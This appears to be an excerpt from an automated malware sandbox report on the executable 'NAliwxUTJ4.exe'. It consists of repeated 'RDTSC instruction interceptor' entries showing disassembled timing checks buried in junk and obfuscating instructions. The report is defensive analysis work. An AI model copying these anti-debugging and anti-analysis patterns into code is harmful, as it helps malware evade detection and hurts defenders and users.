              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B908E1 second address: 4B908E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B908E7 second address: 4B80047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c cmp eax, 00000000h 0x0000000f setne al 0x00000012 jmp 00007FEBD887DA72h 0x00000014 xor ebx, ebx 0x00000016 test al, 01h 0x00000018 jne 00007FEBD887DA77h 0x0000001a sub esp, 04h 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007FEBDCFEB06Bh 0x00000029 mov edi, edi 0x0000002b jmp 00007FEBD887DA80h 0x00000030 xchg eax, ebp 0x00000031 jmp 00007FEBD887DA80h 0x00000036 push eax 0x00000037 jmp 00007FEBD887DA7Bh 0x0000003c xchg eax, ebp 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FEBD887DA85h 0x00000044 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80047 second address: 4B80077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FEBD8FBE243h 0x00000013 push esi 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80077 second address: 4B80116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FEBD887DA7Bh 0x00000008 pop esi 0x00000009 call 00007FEBD887DA89h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 sub esp, 2Ch 0x00000015 jmp 00007FEBD887DA87h 0x0000001a xchg eax, ebx 0x0000001b pushad 0x0000001c call 00007FEBD887DA84h 0x00000021 mov dx, si 0x00000024 pop ecx 0x00000025 pushfd 0x00000026 jmp 00007FEBD887DA87h 0x0000002b or cx, 6B0Eh 0x00000030 jmp 00007FEBD887DA89h 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80116 second address: 4B8011A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8011A second address: 4B80134 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80134 second address: 4B8019A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b mov ax, 9AE7h 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FEBD8FBE23Dh 0x00000016 and si, AF56h 0x0000001b jmp 00007FEBD8FBE241h 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, edi 0x00000023 jmp 00007FEBD8FBE23Eh 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov bx, ax 0x0000002f call 00007FEBD8FBE248h 0x00000034 pop eax 0x00000035 popad 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8020B second address: 4B80241 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FEBD887DA87h 0x00000010 sub edi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80241 second address: 4B80245 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80245 second address: 4B8024B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8024B second address: 4B8027E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 491EA2CCh 0x00000008 mov si, bx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e inc ebx 0x0000000f jmp 00007FEBD8FBE247h 0x00000014 test al, al 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ch, bl 0x0000001b mov eax, 5A956D73h 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8027E second address: 4B802D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEBD887DA7Fh 0x00000009 sub si, 4EDEh 0x0000000e jmp 00007FEBD887DA89h 0x00000013 popfd 0x00000014 movzx ecx, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a je 00007FEBD887DC99h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FEBD887DA86h 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8036A second address: 4B8036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8036E second address: 4B8038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8038B second address: 4B80405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE241h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FEBD8FBE247h 0x00000011 jmp 00007FEBD8FBE243h 0x00000016 popfd 0x00000017 pushfd 0x00000018 jmp 00007FEBD8FBE248h 0x0000001d jmp 00007FEBD8FBE245h 0x00000022 popfd 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80405 second address: 4B80409 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80409 second address: 4B8041C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8041C second address: 4B80422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80443 second address: 4B80499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test eax, eax 0x0000000c jmp 00007FEBD8FBE240h 0x00000011 jg 00007FEC4AD9C25Eh 0x00000017 jmp 00007FEBD8FBE240h 0x0000001c js 00007FEBD8FBE295h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FEBD8FBE247h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80499 second address: 4B8049E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B8049E second address: 4B804D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, bh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007FEBD8FBE23Ch 0x00000011 jne 00007FEC4AD9C21Bh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEBD8FBE247h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B804D5 second address: 4B804EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, dword ptr [ebp+08h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FEBD887DA7Ah 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B804EE second address: 4B804F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B804F3 second address: 4B80543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FEBD887DA87h 0x0000000a xor cx, 24DEh 0x0000000f jmp 00007FEBD887DA89h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 lea eax, dword ptr [ebp-2Ch] 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FEBD887DA7Dh 0x00000022 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80543 second address: 4B80549 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80549 second address: 4B805F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 pushad 0x00000012 mov edi, eax 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a jmp 00007FEBD887DA7Bh 0x0000001f mov dh, ah 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov edi, 0A9DE744h 0x00000029 jmp 00007FEBD887DA7Dh 0x0000002e popad 0x0000002f nop 0x00000030 jmp 00007FEBD887DA7Eh 0x00000035 push eax 0x00000036 jmp 00007FEBD887DA7Bh 0x0000003b nop 0x0000003c pushad 0x0000003d jmp 00007FEBD887DA84h 0x00000042 pushfd 0x00000043 jmp 00007FEBD887DA82h 0x00000048 add esi, 595E7D88h 0x0000004e jmp 00007FEBD887DA7Bh 0x00000053 popfd 0x00000054 popad 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B805F2 second address: 4B805F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80690 second address: 4B80696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80696 second address: 4B8069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70E7B second address: 4B70F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FEBD887DA81h 0x00000009 adc esi, 057E7D66h 0x0000000f jmp 00007FEBD887DA81h 0x00000014 popfd 0x00000015 call 00007FEBD887DA80h 0x0000001a pop ecx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FEBD887DA7Ch 0x00000026 xor esi, 54CEF038h 0x0000002c jmp 00007FEBD887DA7Bh 0x00000031 popfd 0x00000032 mov bx, ax 0x00000035 popad 0x00000036 mov dword ptr [esp], ecx 0x00000039 jmp 00007FEBD887DA82h 0x0000003e mov dword ptr [ebp-04h], 55534552h 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70F03 second address: 4B70F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70F07 second address: 4B70F24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70F24 second address: 4B70F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70F2A second address: 4B70F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70F2E second address: 4B70F32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80984 second address: 4B809B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov bx, si 0x0000000e mov edi, eax 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEBD887DA80h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B809B4 second address: 4B809CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B809CA second address: 4B809E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B809E5 second address: 4B809FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD8FBE244h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B809FD second address: 4B80A01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A01 second address: 4B80A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEBD8FBE249h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A28 second address: 4B80A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A3D second address: 4B80A4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD8FBE23Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A4D second address: 4B80A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [769B459Ch], 05h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A62 second address: 4B80A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A66 second address: 4B80A6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A6A second address: 4B80A70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A70 second address: 4B80A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA7Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80A82 second address: 4B80AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FEC4AD8C1A2h 0x00000011 jmp 00007FEBD8FBE246h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FEBD8FBE247h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80AEB second address: 4B80B3C instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 236ACD3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a call 00007FEBD887DA79h 0x0000000f jmp 00007FEBD887DA88h 0x00000014 push eax 0x00000015 jmp 00007FEBD887DA7Bh 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FEBD887DA84h 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80B3C second address: 4B80BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE23Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FEBD8FBE249h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 jmp 00007FEBD8FBE247h 0x0000001a mov dl, ah 0x0000001c popad 0x0000001d pop eax 0x0000001e pushad 0x0000001f pushad 0x00000020 mov ebx, 4B9346B2h 0x00000025 mov si, di 0x00000028 popad 0x00000029 call 00007FEBD8FBE23Fh 0x0000002e mov ah, FEh 0x00000030 pop edi 0x00000031 popad 0x00000032 call 00007FEC4AD93204h 0x00000037 push 76952B70h 0x0000003c push dword ptr fs:[00000000h] 0x00000043 mov eax, dword ptr [esp+10h] 0x00000047 mov dword ptr [esp+10h], ebp 0x0000004b lea ebp, dword ptr [esp+10h] 0x0000004f sub esp, eax 0x00000051 push ebx 0x00000052 push esi 0x00000053 push edi 0x00000054 mov eax, dword ptr [769B4538h] 0x00000059 xor dword ptr [ebp-04h], eax 0x0000005c xor eax, ebp 0x0000005e push eax 0x0000005f mov dword ptr [ebp-18h], esp 0x00000062 push dword ptr [ebp-08h] 0x00000065 mov eax, dword ptr [ebp-04h] 0x00000068 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000006f mov dword ptr [ebp-08h], eax 0x00000072 lea eax, dword ptr [ebp-10h] 0x00000075 mov dword ptr fs:[00000000h], eax 0x0000007b ret 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f mov ecx, ebx 0x00000081 mov bh, 22h 0x00000083 popad 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80BB1 second address: 4B80C09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushfd 0x00000007 jmp 00007FEBD887DA7Ah 0x0000000c or cl, 00000028h 0x0000000f jmp 00007FEBD887DA7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub esi, esi 0x0000001a pushad 0x0000001b push edx 0x0000001c call 00007FEBD887DA80h 0x00000021 pop ecx 0x00000022 pop edx 0x00000023 movzx esi, dx 0x00000026 popad 0x00000027 mov dword ptr [ebp-1Ch], esi 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FEBD887DA86h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80C25 second address: 4B80C4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80C4A second address: 4B80C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80C4E second address: 4B80C52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80C52 second address: 4B80C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B80C58 second address: 4B80CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE242h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEC4AD81F4Dh 0x0000000f jmp 00007FEBD8FBE240h 0x00000014 cmp dword ptr [ebp+08h], 00002000h 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e call 00007FEBD8FBE23Dh 0x00000023 pop ecx 0x00000024 mov si, dx 0x00000027 popad 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A04 second address: 4B90A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FEC4A6534F0h 0x0000000f jmp 00007FEBD887DA7Eh 0x00000014 xchg eax, esi 0x00000015 jmp 00007FEBD887DA80h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A49 second address: 4B90A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A4D second address: 4B90A51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A51 second address: 4B90A57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A57 second address: 4B90A7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FEBD887DA80h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A7F second address: 4B90A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90A9B second address: 4B90AA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AA2 second address: 4B90AC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 76E7A87Bh 0x00000008 jmp 00007FEBD8FBE240h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AC4 second address: 4B90AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90AC8 second address: 4B90ACE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90ACE second address: 4B90AFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f mov edi, 358524BEh 0x00000014 popad 0x00000015 xchg eax, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push ecx 0x0000001a pop edx 0x0000001b mov dx, cx 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B27 second address: 4B90B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov al, DAh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FEBD8FBE242h 0x00000015 adc si, CF48h 0x0000001a jmp 00007FEBD8FBE23Bh 0x0000001f popfd 0x00000020 push ecx 0x00000021 pop edi 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90B5D second address: 4B90B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA80h 0x00000009 rdtsc
